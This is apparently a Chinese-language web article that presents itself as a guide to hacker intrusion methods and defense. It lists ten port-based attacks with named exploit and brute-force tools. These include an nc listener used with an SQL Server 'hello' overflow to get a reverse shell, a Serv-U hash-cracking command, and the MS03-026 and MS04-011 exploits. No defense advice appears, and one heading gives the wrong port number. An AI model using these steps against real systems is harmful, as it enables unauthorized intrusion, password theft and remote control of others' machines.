常見(jiàn)的黑客入侵方法與防范
常見(jiàn)的黑客入侵方法與防范
本文簡(jiǎn)單介紹目前黑客最常使用的一些入侵工具及防御的方法,希望能對(duì)大家有所幫助,以助于大家能更好地防御黑客的攻擊,下面學(xué)習(xí)啦小編來(lái)告訴你吧!
1. 利用4899端口入侵
4899端口是一個(gè)遠(yuǎn)程控制軟件(remote administrator)服務(wù)端監(jiān)聽(tīng)的端口,他不能算是一個(gè)木馬程序,但是具有遠(yuǎn)程控制功能,通常殺毒軟件是無(wú)法查出它來(lái)的
用4899過(guò)濾器.exe,掃描空口令的機(jī)器
2. 利用3899的入侵
對(duì)很早的機(jī)器,可以試試3389的溢出
對(duì)2000的機(jī)器,可以試試字典暴破。
3.利用1433端口入侵
1433端口,是SQL Server默認(rèn)的端口,SQL Server服務(wù)使用兩個(gè)端口:TCP-1433、UDP-1434。其中1433用于供SQL Server對(duì)外提供服務(wù),1434用于向請(qǐng)求者返回SQL Server使用了哪個(gè)TCP/IP端口。
scanport.exe 查有1433的機(jī)器
SQLScanPass.exe 進(jìn)行字典暴破(字典是關(guān)鍵)
最后 SQLTools.exe入侵
對(duì)sql的sp2及以下的系統(tǒng),可用sql的hello 溢出漏洞入侵。
nc -vv -l -p 本機(jī)端口 sqlhelloF.exe 入侵ip 1433 本機(jī)ip 本機(jī)端口
(以上反向的,測(cè)試成功)
sqlhelloz.exe 入侵ip 1433 (這個(gè)是正向連接)
4. 利用80端口入侵
80端口是為HTTP(HyperText Transport Protocol)即超文本傳輸協(xié)議開放的,此為上網(wǎng)沖浪使用次數(shù)最多的協(xié)議,主要用于WWW(World Wide Web)即萬(wàn)維網(wǎng)傳輸信息的協(xié)議。可以通過(guò)HTTP地址(即常說(shuō)的“網(wǎng)址”)加“:80”來(lái)訪問(wèn)網(wǎng)站,因?yàn)闉g覽網(wǎng)頁(yè)服務(wù)默認(rèn)的端口號(hào)都是80,因此只需輸入網(wǎng)址即可,不用輸入“:80”了。
對(duì)sp3以前的機(jī)器,可以用webdav入侵;
對(duì)bbs論壇,可以試試上傳漏洞(upfile.exe或dvup_delphi.exe)
可以利用SQL進(jìn)行注入。(小榕的注入軟件)。
5. 利用serv-u入侵(21端口)
21端口主要用于FTP(File Transfer Protocol,文件傳輸協(xié)議)服務(wù),F(xiàn)TP服務(wù)主要是為了在兩臺(tái)計(jì)算機(jī)之間實(shí)現(xiàn)文件的上傳與下載,一臺(tái)計(jì)算機(jī)作為FTP客戶端,另一臺(tái)計(jì)算機(jī)作為FTP服務(wù)器,可以采用匿名(anonymous)登錄和授權(quán)用戶名與密碼登錄兩種方式登錄FTP服務(wù)器。
對(duì)5. 004及以下系統(tǒng),可用溢出入侵。(serv5004.exe)
對(duì)5.1.0.0及以下系統(tǒng),可用本地提升權(quán)限。(servlocal.exe)
對(duì)serv-u的MD5加密密碼,可以用字典暴破。(crack.vbs)
輸入一個(gè)被serv-u加密的密碼(34位長(zhǎng)),通過(guò)與字典檔(dict.txt)的比較,得到密碼。如:cscript crack.vbs ib0AD10648F17E9E8D1FF316C1BA75105A
6. 利用554端口
用real554.exe入侵。
7. 利用6129端口
用DameWare6129.exe入侵。
8. 利用系統(tǒng)漏洞
利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞,
進(jìn)行溢出入侵。
9. 利用3127等端口
可以利用doom病毒開的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)。
10. 利用其他入侵
利用shanlu的入侵軟件入侵(WINNTAutoAttack.exe)。